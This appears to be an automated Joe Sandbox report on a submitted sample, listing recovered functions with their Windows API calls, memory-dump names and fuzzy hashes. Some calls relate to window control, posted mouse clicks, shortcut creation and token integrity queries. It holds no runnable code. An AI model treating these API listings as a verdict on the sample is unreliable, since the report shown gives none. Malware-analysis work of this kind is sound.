
APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 003B6433
TranslateMessage.USER32(?), ref: 003B645C
DispatchMessageW.USER32(?), ref: 003B6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003B6475

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 117d209abdab0fd68b2699b6a911bdfda7b8a4b7164d460b5db77c6ad3aa9045
Instruction ID: 4a80da508d733d2516dc40980a4d414bb7be264d4c619dec004de08ebbd280fa
Opcode Fuzzy Hash: 117d209abdab0fd68b2699b6a911bdfda7b8a4b7164d460b5db77c6ad3aa9045
Instruction Fuzzy Hash: BE310631600A42DFDB328F71CC46BF67BACAB01308F550175E625C78A2E7789845CB60

Function 003B8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 003B8A30
PostMessageW.USER32(?,00000201,00000001), ref: 003B8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003B8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 003B8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003B8AF8

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: a7fed25b820ec47777a1b7bf8320122c03c787f43d239f6f509581d5872f8c40
Instruction ID: 79d3397cd51049d19cce5fc0168d15d4a3a7e4bb9ec2705c2e31106621492d72
Opcode Fuzzy Hash: a7fed25b820ec47777a1b7bf8320122c03c787f43d239f6f509581d5872f8c40
Instruction Fuzzy Hash: 3A31D171500259EFDF15CF68D98CADE7BB9EB04319F108229FA24EA6D0C7B09910CB90

Function 003BB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 003BB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003BB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003BB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003BB27F
_wcsstr.LIBCMT ref: 003BB289

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 48bc25584336cb845da0e28bfe50f89e00e1e0a27fef2d942159b50223ae4cff
Instruction ID: e12cdc944abdb379aad504944a4471e9d9a7d147eb34a897ac49c48ef3f89dba
Opcode Fuzzy Hash: 48bc25584336cb845da0e28bfe50f89e00e1e0a27fef2d942159b50223ae4cff
Instruction Fuzzy Hash: A821D331204240ABEB276B799C49ABFBB9CDF49710F014179F904DE5A1EFA1DC409360

Function 003EB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623

GetWindowLongW.USER32(?,000000F0), ref: 003EB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003EB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003EB1CF
GetSystemMetrics.USER32(00000004), ref: 003EB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,003D0E90,00000000), ref: 003EB216

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: d16e6a01f3fcd3c6430345962bc00b33b40bea01008572fdea16d59e74b39c81
Instruction ID: 0de6004efe1229762fcf3ccf6bc777da8a4ad59d530286f7944aaa03909c6221
Opcode Fuzzy Hash: d16e6a01f3fcd3c6430345962bc00b33b40bea01008572fdea16d59e74b39c81
Instruction Fuzzy Hash: A42171716106A5AFCB229F399C44A6B77A8EB06371F114B34A922D71E0D77098219B90

Function 003B9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003B9320

Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003B9352
__itow.LIBCMT ref: 003B936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003B9392
__itow.LIBCMT ref: 003B93A3

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 508a329101f04af043cd65c4b3a39fb1b93c1abd2a9ef7c54d5b2495cdf826aa
Instruction ID: 0bfe4002464c99d5af2dc685e2fd76dd910cb9766f8d0ae3ffa854e7c7dd51a1
Opcode Fuzzy Hash: 508a329101f04af043cd65c4b3a39fb1b93c1abd2a9ef7c54d5b2495cdf826aa
Instruction Fuzzy Hash: 4521B335700208BBDB12AA658CC5FEE7BADEF49718F044026FB499B2D1D6B089458791

Function 003D5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 003D5A6E
GetForegroundWindow.USER32 ref: 003D5A85
GetDC.USER32(00000000), ref: 003D5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 003D5ACD
ReleaseDC.USER32(00000000,00000003), ref: 003D5B08

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f5d8ff0d39d4ce73ed9f21486c0a100a1ab8d2de6e1ed826c6675051d5173e28
Instruction ID: ce9cae060b9622a7de74bca99de91c47a6a254f83f01340b29167f3d30d3d33c
Opcode Fuzzy Hash: f5d8ff0d39d4ce73ed9f21486c0a100a1ab8d2de6e1ed826c6675051d5173e28
Instruction Fuzzy Hash: 1A216F76A00114AFDB15EF65D884A9ABBE9EF48350F14C57AF809DB362DA70AD00CB90

Function 003612F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0036134D
SelectObject.GDI32(?,00000000), ref: 0036135C
BeginPath.GDI32(?), ref: 00361373
SelectObject.GDI32(?,00000000), ref: 0036139C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c3d26ad101a40c7a8ea82601e61f771f9aaf99c793ebc03f3690447b30005cd5
Instruction ID: f721bf70ff9c17989c1679ea05acfdfedc3e377f3a84c045a573eafead12d079
Opcode Fuzzy Hash: c3d26ad101a40c7a8ea82601e61f771f9aaf99c793ebc03f3690447b30005cd5
Instruction Fuzzy Hash: E721B634900608DFDB22AF25DD447697BE8FB00321F688225F4119A6B4D3F099A2DF54

Function 003C4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 003C4ABA
__beginthreadex.LIBCMT ref: 003C4AD8
MessageBoxW.USER32(?,?,?,?), ref: 003C4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003C4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003C4B0A

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: f3b936e7a28e1aac29512795dab40494194f392cdc78f300060437d29d86debe
Instruction ID: d32aebb53d1d132502b42f87f484b4bea7deba3bb5249125dd87635b496dd778
Opcode Fuzzy Hash: f3b936e7a28e1aac29512795dab40494194f392cdc78f300060437d29d86debe
Instruction Fuzzy Hash: 0E11E576A04248BFC7229BA89C44F9A7BACEB45320F1442A9F814D7290D6B18D008BA0

Function 003B8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B821E
GetLastError.KERNEL32(?,003B7CE2,?,?,?), ref: 003B8228
GetProcessHeap.KERNEL32(00000008,?,?,003B7CE2,?,?,?), ref: 003B8237
HeapAlloc.KERNEL32(00000000,?,003B7CE2,?,?,?), ref: 003B823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B8255

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 187100892d96c7fd731cfad6d0df89a7ee88fad2f25148ab67be5127d535c177
Instruction ID: de87e76b83465c29f7d948a5b4b6d677381eda645e3065af68e4978951ef06f6
Opcode Fuzzy Hash: 187100892d96c7fd731cfad6d0df89a7ee88fad2f25148ab67be5127d535c177
Instruction Fuzzy Hash: B4018671201645FFDB224FA5DC88DA77F6CEF86754B504929F909CB1A0DB718C00CA60

Function 003B710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?,?,003B7455), ref: 003B7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?), ref: 003B7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003B7044,80070057,?,?), ref: 003B716C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 2c9d260473cefd4c6a7990e541e08d0c09a963d38525c67516ab2b092a1f98fa
Instruction ID: d89b245a5a0ff8ead020d4300d7bf7bdcb9955f123b87211f8ef3db83968e9a8
Opcode Fuzzy Hash: 2c9d260473cefd4c6a7990e541e08d0c09a963d38525c67516ab2b092a1f98fa
Instruction Fuzzy Hash: 19018FB6601204BFDB224F68DC84BEA7BADEF84795F154164FE08E6220D771ED409BA0

Function 003C5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003C526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003C5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 436607fe8cffad72030be8a6fa7ed8b5ab3a692b1c66731868255ef2eb7fd463
Instruction ID: ec49a125320b679ab694fe7908bc2ef7aa130e0b7da0358066b0695ac88af366
Opcode Fuzzy Hash: 436607fe8cffad72030be8a6fa7ed8b5ab3a692b1c66731868255ef2eb7fd463
Instruction Fuzzy Hash: C7016D31D01A1DDBCF11EFE4E888AEDBBBCFB09311F410969E941F6180CB70699087A1

Function 003B810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: be0fad539cbf30bcfd862fd4df7c8577a2815987a8f5535827cdf186b532bf05
Instruction ID: 3dec80d18446eb5596bce03d1da17ca7c668572c92a76689aec95df98b66ae62
Opcode Fuzzy Hash: be0fad539cbf30bcfd862fd4df7c8577a2815987a8f5535827cdf186b532bf05
Instruction Fuzzy Hash: B3F06875201344AFD7220F65DCC8EA73BACFF85758F010125F645D6190CBA1DD41DA60

Function 003BC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 003BC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 003BC20E
MessageBeep.USER32(00000000), ref: 003BC226
KillTimer.USER32(?,0000040A), ref: 003BC242
EndDialog.USER32(?,00000001), ref: 003BC25C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 961e5a5d150b83896d27833405c3601eece31f100f21126e3b9d7d721bf9d898
Instruction ID: 8a7224d1ac4fbe4760b7b72a45dc866b459a1bf3626a9b33f00e9cd82b708c06
Opcode Fuzzy Hash: 961e5a5d150b83896d27833405c3601eece31f100f21126e3b9d7d721bf9d898
Instruction Fuzzy Hash: 0701A7304143089BEF325B50DD8EBD6777CBB0070AF000769A682998E0D7F069448B50

Function 003613B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 003613BF
StrokeAndFillPath.GDI32(?,?,0039B888,00000000,?), ref: 003613DB
SelectObject.GDI32(?,00000000), ref: 003613EE
DeleteObject.GDI32 ref: 00361401
StrokePath.GDI32(?), ref: 0036141C

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f72d2b7a0a768bdb3b35681808e52b4e24c61f1efd4a37f49558a4006f8fd324
Instruction ID: 5061036940e350964a46e4356e9256b747742f54df32a268b7877602719cab31
Opcode Fuzzy Hash: f72d2b7a0a768bdb3b35681808e52b4e24c61f1efd4a37f49558a4006f8fd324
Instruction Fuzzy Hash: 89F0B630104A48EFDB336F26EC897683FA8AB01326F58C635E429495F5C7B149A6DF54

Function 003CC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 003CC432
CoCreateInstance.OLE32(003F2D6C,00000000,00000001,003F2BDC,?), ref: 003CC44A

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

CoUninitialize.OLE32 ref: 003CC6B7

Strings

.lnk, xrefs: 003CC3C6, 003CC3EE, 003CC3F8

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: cc88e9b085818a6ccca30d502cc16709b139880c05962db566b2e9cee0808589
Instruction ID: c84769c0d7fa6587ca0c00cdc7161cb083123352c7492ab80a305a3a5e031a83
Opcode Fuzzy Hash: cc88e9b085818a6ccca30d502cc16709b139880c05962db566b2e9cee0808589
Instruction Fuzzy Hash: 27A13BB1104205AFD701EF54C891EABB7ECEF99358F00892DF1959B1A2DB71EA09CB52

Function 00372CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00380DB6: std::exception::exception.LIBCMT ref: 00380DEC
Part of subcall function 00380DB6: __CxxThrowException@8.LIBCMT ref: 00380E01

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 00367A51: _memmove.LIBCMT ref: 00367AAB

__swprintf.LIBCMT ref: 00372ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00372D66

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: dd2d57a27df31eddd83df50edd754c246f91dece3e2eecd0f8f21e14155196c8
Instruction ID: c5fae3a565d101d6bad38709f6a30271984b243a52bd922dc7f8591e1bbcc26b
Opcode Fuzzy Hash: dd2d57a27df31eddd83df50edd754c246f91dece3e2eecd0f8f21e14155196c8
Instruction Fuzzy Hash: 73914B711082019FC726EF24C896C6FB7E8EF96710F04891DF4969B2A5EB34ED44CB62

Function 003CB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00364750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00364743,?,?,003637AE,?), ref: 00364770

CoInitialize.OLE32(00000000), ref: 003CB9BB
CoCreateInstance.OLE32(003F2D6C,00000000,00000001,003F2BDC,?), ref: 003CB9D4
CoUninitialize.OLE32 ref: 003CB9F1

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

Strings

.lnk, xrefs: 003CB99D, 003CB9AB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
